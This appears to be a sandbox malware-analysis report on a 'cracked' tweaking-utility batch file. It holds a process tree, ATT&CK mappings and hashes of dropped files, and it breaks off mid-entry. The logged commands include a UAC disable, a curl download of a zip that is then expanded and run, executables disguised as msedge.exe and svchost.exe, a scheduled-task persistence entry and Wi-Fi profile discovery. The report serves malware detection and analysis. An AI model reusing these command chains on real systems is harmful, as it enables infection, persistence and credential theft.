  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6128 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1728

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2884

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3872

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat" "
1⤵
PID:4816
- C:\Windows\system32\reg.exe
  Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
  2⤵
  PID:3100
- C:\Windows\system32\reg.exe
  Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
  2⤵
  PID:4360
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
  2⤵
  PID:1336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4060
- C:\Windows\system32\reg.exe
  Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
  2⤵
  - UAC bypass
  PID:276
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
  2⤵
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
  2⤵
  PID:2124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path Win32_UserAccount where name="Admin" get sid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- - C:\Windows\system32\findstr.exe
    findstr "S-"
    3⤵
    PID:4408
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:2888
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:684
- C:\Windows\system32\curl.exe
  curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
  2⤵
  PID:1008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\exm\EXMservice.exe
  EXMservice.exe
  2⤵
  - Executes dropped EXE
  PID:3900
- - C:\Users\Admin\msedge.exe
    "C:\Users\Admin\msedge.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3316
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1176
- - C:\Users\Admin\svchost.exe
    "C:\Users\Admin\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Drops desktop.ini file(s)
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4432
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5088
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1276
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3948
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2912
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
      4⤵
      System Location Discovery: System Language Discovery
      PID:4600
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1728
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2784
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4964
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.BingWeather* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.GetHelp* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.Getstarted* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3136
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.Messaging* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1008
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.Microsoft3DViewer* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.MicrosoftSolitaireCollection* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.MicrosoftStickyNotes* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1952
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.MixedReality.Portal* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1440
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.OneConnect* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4456
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.People* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3700
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.Print3D* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2592
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.SkypeApp* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:556
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsAlarms* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsCamera* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4228
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *microsoft.windowscommunicationsapps* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1480
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsMaps* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4424
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsFeedbackHub* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3212
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsSoundRecorder* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2132
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.YourPhone* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2888
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.ZuneMusic* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4824
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.HEIFImageExtension* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3880
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.WebMediaExtensions* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2072
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.WebpImageExtension* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2088
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "& {Get-AppxPackage *Microsoft.3dBuilder* | Remove-AppxPackage}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2516
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *bing* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1816
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *bingfinance* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2876
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *bingsports* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4368
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1524
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *CommsPhone* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:684
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *Drawboard PDF* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:388
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *Sway* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1008
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *WindowsAlarms* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *WindowsPhone* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1480
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage -allusers *zune* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1868
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage Microsoft.MicrosoftEdge_41.16299.1004.0_netural__8wekyb3d8bbwe∩╜£Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3192
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:1060

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
PID:3324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\1572269cc8513f03ec944e17d3fc2d79\msgid.dat

Filesize
5B

MD5
d276fd6b6eeeb1987e76d0388d813b9f

SHA1
354c4f5863ef537c01f92b28f6d75e03010f9c75

SHA256
35707f17136e25c293287356e308d7cb982521f8d8bd3f85d7894fce9346359c

SHA512
04743373ed3fb06cb7e3e024823753737d305b467eea1e8f1cdc8536dad78efe703688e3ad810c556a10816d3e3a52f4dedfb9ff0d3f1141794cd46552433a47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d30a5618854b9da7bcfc03aeb0a594c4

SHA1
7f37105d7e5b1ecb270726915956c2271116eab7

SHA256
3494c446aa3cb038f1d920b26910b7fe1f4286db78cb3f203ad02cb93889c1a8

SHA512
efd488fcd1729017a596ddd2950bff07d5a11140cba56ff8e0c62ef62827b35c22857bc4f5f5ea11ccc2e1394c0b3ee8651df62a25e66710f320e7a2cf4d1a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
03a56f81ee69dd9727832df26709a1c9

SHA1
ab6754cc9ebd922ef3c37b7e84ff20e250cfde3b

SHA256
65d97e83b315d9140f3922b278d08352809f955e2a714fedfaea6283a5300e53

SHA512
e9915f11e74c1bcf7f80d1bcdc8175df820af30f223a17c0fe11b6808e5a400550dcbe59b64346b7741c7c77735abefaf2c988753e11d086000522a05a0f7781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
32KB

MD5
3a424bb561ae752690676fefb1bceb8f

SHA1
3d56a08693e150b38ce6ffcdc3d772a5b52f8ca2

SHA256
53fc575fab4674e387d7ee82cfac0958744e8890d951ab96761057d4e88c9fef

SHA512
9674cfa1f800d71678ff3f9ebf623c9c188f4467a8aec02c7ef5704b34866d751b1c6254f46fae86138e45035083de220f6658f8d0ae0df5b4e5aeb787a1edc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

Filesize
213KB

MD5
f942900ff0a10f251d338c612c456948

SHA1
4a283d3c8f3dc491e43c430d97c3489ee7a3d320

SHA256
38b76a54655aff71271a9ad376ac17f20187abd581bf5aced69ccde0fe6e2fd6

SHA512
9b393ce73598ed1997d28ceeddb23491a4d986c337984878ebb0ae06019e30ea77448d375d3d6563c774856d6bc98ee3ca0e0ba88ea5769a451a5e814f6ddb41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
744B

MD5
778e0f8b61f9c6e401df7b179dbc77a7

SHA1
dfa1c483099fb3fe19ff3948aa51b18771fd8bc5

SHA256
e31b319717621b0e619df1da33b3137dd28479506a6918697083fe3bb43de77f

SHA512
08dfaf259f8214802c85eaf8e183b65c0d4b8b500dc106382a98b402f2b593ec963d062f0cc59c4941fe537b28f57b79cf1e2dfbf02258aeb2be4ed743184451

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
eaf1776cb5f13c32ad7888037741c068

SHA1
765dd1c393502862ff0dd29174bd0e6995a64955

SHA256
4a8e836b9b3c40dc26d57af2582c92179b5c143cc9d645da6ca4ac0f18b3742e

SHA512
3d099ad6f2442a9e8b9f45bfd9b5cdddd13f843dc3a125f33942926646537c09ddb3df0994d0dbb607363c6e4b9e63c26121accdb357ea7760289f0220ed2100

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
116KB

MD5
e5f970800fe388ce54a380a6bde9f5a1

SHA1
016e9232f64beffaca021fccd17dcb8b2eccad64

SHA256
ae23fb881ef86d5a998a5f56ce54da483002cea437cbf8c3762a36f88e03891c

SHA512
41c9c7acca05b7ced96ac97fe2fe8d17e82301df9bec6a9bdb897173556895db45d67595a6cba63cb0ce672ac30e460e7278fb0addf80bb3c853bc3a37f93611

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
77b8eeb62f6e742e78f541e8aaca54e9

SHA1
9c08c316881fbcc62848ff196a55b9f5db2eb698

SHA256
26cb734489276e5380a6e6cd26188b376608cd70210a4b6c9e6d860e581a7f31

SHA512
f3e20e00e2f5af87a0bdc5195b20afdad0c8a28cedb0cbefb9df554cca9894fda65fe724dbb0616768196d766c9b308deb4cb1ee8845ddddbf8f619edc5ad78a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
28281835469457c27fbc62f6a6f2f7cc

SHA1
0bbed5f990a1f9b475a7f3dbb2c20487372eff97

SHA256
58740d10087513c8bb3e29ca12f64650f1524b51ef7c297915ef27c02be69471

SHA512
73dcadd2b7153c5d181dded58dc7d539caca47256211098b3bc3228313101a0a0f24c80eedbe4712d9875719f489212feb06fc76049cdc083831f8b93a730ceb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f4d8dee44cfe9802aaaf3bc2f6f7abc5

SHA1
93aa3ea5471cce87a02bdfd2b71adfebc41e54c8

SHA256
01ba3d9e7d12c4c6ed146e6f745a3e3a88d4dfaa56548cda9f5d10f917e6789a

SHA512
85b7576ebc3691eea771b7f105311e8cc075968e3e9d21075f047dad5fd9271d44da0aec462d6e1932fbb1dbfc744fa8663094f3271cc8f2e80a4b27f018a485

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
06d7826a195ee891fe876c309dbf29bd

SHA1
25eb2a1be141702d4b3b33654922e05918198ccf

SHA256
51fab0a80d89a84b62cf41bb948b1f1ea35f2f3ddfdcd0a2bb60758ce2fa336e

SHA512
7413ac1d07fe2679d36d0a8d776bece912b9c131dc768147b2452b22f9fb888e199801ffdc333b2cda3115f62cb4e53574dc3c856ceb8e2935d989df0fb65184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f5579ae57d905788d0a94847de95600e

SHA1
4a731afa3b29c71fbe8df16a78db2d54c3e09368

SHA256
15502d1f625f8cb48ac7767d8096af761dd926987af3a81f8174d6715cc09821

SHA512
b63401f643ec309da3533a946afce3f16486ffb35e525d5c2770e01509c7b2e87aeb3a10b5c526aa5da50d6038ce35ab229b9733ba7b4c2a0b1ab98f41ec9784

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\fef3024c-6b5a-4f4d-a0aa-c0d79ae7f5c5\index-dir\the-real-index

Filesize
72B

MD5
31a6d36ea2bf349895a66f5eeb8bcd6a

SHA1
fe2af64d59f5782a34037c3e2205cc9b2ccadca6

SHA256
56c0b91126f5c662a289ed0952570dc0e60f1cb8e5e0dbe9c0c15f21b909fc65

SHA512
44f972711ee2bc2b0505d1ef774a2c8a432e6f8747d98a3dabfa76a4b17486935ac458499e854290be1413bb150ed130001c37136ac5a1240cb94d973f46bfb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\fef3024c-6b5a-4f4d-a0aa-c0d79ae7f5c5\index-dir\the-real-index~RFe5820e1.TMP

Filesize
48B

MD5
f9a6f7e2ea35a4e3942b885abd4d80ab

SHA1
73b4c4128f45885dbe47e598c5b9a8959d0e8321

SHA256
2926de5e22eefb328ac4115ff63b6b03c962691cb99d74401d5286512db6192e

SHA512
812e72e426b94cb42083465f0d656089bc0ff7be0bef237a1ccbf56e088cd0e3ee6ed71b16bad4e8cba0f1719b134686516c47273afc81310743879a3b199ea2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\index.txt

Filesize
